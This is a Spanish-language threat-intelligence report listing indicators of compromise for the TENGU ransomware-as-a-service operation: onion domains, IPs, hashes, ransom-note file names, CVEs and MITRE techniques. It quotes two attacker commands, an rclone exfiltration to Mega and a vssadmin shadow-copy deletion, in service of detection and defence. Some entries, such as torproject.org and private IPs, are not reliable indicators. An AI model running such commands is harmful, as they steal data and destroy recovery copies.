Resumen
Artefactos identificados asociados a TENGU Ransomware (TenguLocker / TenguRaaS). Esta operacion de ransomware como servicio opera mediante sitios .onion, utiliza herramientas como ScreenConnect y WinSCP para acceso remoto, emplea LOLBins nativos de Windows para evasion, y exfiltra datos via rclone hacia Mega.nz.
Datos clave
- Contacto: [email protected] / [email protected]
- Twitter/X: @TenguRaaS
- Modo: Ransomware-as-a-Service (RaaS)
- Exfiltracion: rclone -> Mega.nz
- Herramientas: ScreenConnect, WinSCP, rclone
Indicadores de Compromiso (IOCs)
Tabla con 141 artefactos identificados de diversa naturaleza: comandos, CVE, dominios onion, IPs, hashes, emails, ficheros, LOLBins, rutas, registro, herramientas y tecnicas MITRE ATT&CK.
| Tipo | Valor | Contexto |
|---|---|---|
| COMMAND | rclone copy C:\Staging\Data mega_remote:Exfiltrated_Data --bwlimit 5M -q | TENGU |
| COMMAND | vssadmin delete shadows /all /quiet | TENGU |
| CVE | CVE-2020-1472 | TENGU |
| CVE | CVE-2026-23477 | TENGU |
| CVE | CVE-2025-43995 | TENGU |
| CVE | CVE-2024-38178 | TENGU |
| CVE | CVE-2025-55754 | TENGU |
| CVE | CVE-2026-20253 | TENGU |
| DOMAIN | fuvodyoktsjdwu3mrbbrmdsmtblkxau6l7r5dygfwgzhf36mabjtcjad.onion | TENGU |
| DOMAIN | longcc4fqrfcqt5lzceutylaxir6h66fp6df3oin6mvwvz6pfdbxc6qd.onion | TENGU |
| DOMAIN | longejh5gj5igfinj36rmqt2ydx2vun6zmditi3ij6hebawnn4xucqad.onion | TENGU |
| DOMAIN | longf6faa6tiudn5n6ar77z5balign2cxo2tjfsxuf6wnlzjamqew2yd.onion | TENGU |
| DOMAIN | longhbqhzlv3p7tvx3iwhfizkmtkm2nhnlbw5d4qr65wjz5e6aa23mid.onion | TENGU |
| DOMAIN | longjr5sl6a57ajn52nysmvgobmb7lktjthssmt2jeyjagk3rw36djyd.onion | TENGU |
| DOMAIN | longvqprqrb4zbxooswz4upefhtikhnyqv4gw4fkzpkc2wjpvxsucwid.onion | TENGU |
| DOMAIN | howdkesnbd7yh7r7h7uns4yylu6cjxs4tus64foquq5a2bzml2ur6uqd.onion | TENGU |
| DOMAIN | www.torproject.org | TENGU |
| DOMAIN | shisha.tengu | TENGU |
| DOMAIN | Mega.nz | TENGU |
[email protected] | TENGU | |
[email protected] | TENGU | |
| FILE | rand.README.txt | TENGU |
| FILE | wraithnet_bot.exe | TENGU |
| FILE | controller_gui.exe | TENGU |
| FILE | controller_console.exe | TENGU |
| FILE | README.txt | TENGU |
| FILE | wraithnet.log | TENGU |
| FILE | 8F2Z-README.txt | TENGU |
| FILE | TENGU.README.txt | TENGU |
| FILE | TENGU_README.txt | TENGU |
| HASH | FAFB6C5E12DFEEFABA5AC8982D5BB13DD206CFCD328B9D36AA87257F762EE24A | TENGU |
| HASH | DFBC9412BE99B25137AB6AB575489A93 | TENGU |
| HASH | 62c6ba7f5356663c46b8918b6a0994fc | TENGU |
| HASH | b400c58e7e227361cc689078ce9163c4 | TENGU |
| HASH | 3b18e9da970fa7d336b08c5df04668b7 | TENGU |
| HASH | 511a4780cbd9ed2280b432afc6cbfd1a | TENGU |
| HASH | b8c81e1e17adcaf9e84d76401697b7e5 | TENGU |
| HASH | 7ac4f264f595e15f77025527994b74e5 | TENGU |
| IP | 110.227.205.232 | TENGU |
| IP | 123.255.248.97 | TENGU |
| IP | 94.26.88.100 | TENGU |
| IP | 94.26.88.101 | TENGU |
| IP | 94.26.88.102 | TENGU |
| IP | 117.240.9.147 | TENGU |
| IP | 206.168.81.33 | TENGU |
| IP | 61.0.226.126 | TENGU |
| IP | 149.88.72.63 | TENGU |
| IP | 194.165.16.164 | TENGU |
| IP | 194.165.16.167 | TENGU |
| IP | 45.227.254.156 | TENGU |
| IP | 88.214.25.125 | TENGU |
| IP | 91.238.181.93 | TENGU |
| IP | 91.238.181.95 | TENGU |
| IP | 94.26.88.103 | TENGU |
| IP | 117.239.53.213 | TENGU |
| IP | 117.244.244.52 | TENGU |
| IP | 192.168.1.3 | TENGU |
| IP | 103.80.211.131 | TENGU |
| IP | 117.250.6.65 | TENGU |
| IP | 122.129.85.250 | TENGU |
| IP | 185.11.61.27 | TENGU |
| IP | 192.168.1.106 | TENGU |
| IP | 192.168.1.75 | TENGU |
| IP | 194.165.16.161 | TENGU |
| IP | 194.165.16.163 | TENGU |
| IP | 45.227.254.151 | TENGU |
| IP | 45.227.254.152 | TENGU |
| IP | 45.227.254.153 | TENGU |
| IP | 49.51.142.252 | TENGU |
| IP | 71.6.134.232 | TENGU |
| IP | 88.214.25.121 | TENGU |
| IP | 91.238.181.96 | TENGU |
| LOLBIN | rundll32.exe | TENGU |
| LOLBIN | powershell.exe | TENGU |
| LOLBIN | cmd.exe | TENGU |
| LOLBIN | schtasks.exe | TENGU |
| LOLBIN | sc.exe | TENGU |
| LOLBIN | wevtutil | TENGU |
| LOLBIN | vssadmin | TENGU |
| LOLBIN | rclone | TENGU |
| MITRE | T1078 | TENGU |
| MITRE | T1190 | TENGU |
| MITRE | T1490 | TENGU |
| MITRE | T1486 | TENGU |
| MITRE | T1567 | TENGU |
| MITRE | T1041 | TENGU |
| MITRE | T1070 | TENGU |
| MITRE | T1218 | TENGU |
| MITRE | T1046 | TENGU |
| MITRE | T1133 | TENGU |
| MITRE | T1566 | TENGU |
| MITRE | T1059 | TENGU |
| MITRE | T1562 | TENGU |
| MITRE | T1074 | TENGU |
| MITRE | T1547.001 | TENGU |
| MITRE | T1003 | TENGU |
| MITRE | T1555 | TENGU |
| MITRE | T1018 | TENGU |
| MITRE | T1021 | TENGU |
| MITRE | T1059.001 | TENGU |
| MITRE | T1059.003 | TENGU |
| MITRE | T1566.002 | TENGU |
| MITRE | T1068 | TENGU |
| MITRE | T1021.001 | TENGU |
| MITRE | T1039 | TENGU |
| MITRE | T1552 | TENGU |
| MITRE | T1005 | TENGU |
| MITRE | T1565 | TENGU |
| MITRE | T1567.002 | TENGU |
| MITRE | T1218.011 | TENGU |
| MITRE | T1003.001 | TENGU |
| MITRE | T1562.001 | TENGU |
| MITRE | T1070.001 | TENGU |
| MITRE | T1595.002 | TENGU |
| MITRE | T1219 | TENGU |
| MITRE | T1078.002 | TENGU |
| MITRE | T1110.001 | TENGU |
| MITRE | T1110.003 | TENGU |
| MITRE | T1087.002 | TENGU |
| MITRE | T1021.002 | TENGU |
Tecnicas MITRE ATT&CK
Se identificaron mas de 30 tecnicas MITRE incluyendo T1078 (Valid Accounts), T1190 (Exploit Public-Facing App), T1486 (Data Encrypted for Impact), T1041 (Exfiltration Over C2), T1562 (Impair Defenses), T1567 (Exfiltration Over Web Service), T1070 (Indicator Removal), T1218 (Signed Binary Proxy Execution), T1003 (OS Credential Dumping), T1490 (Inhibit System Recovery), entre otras.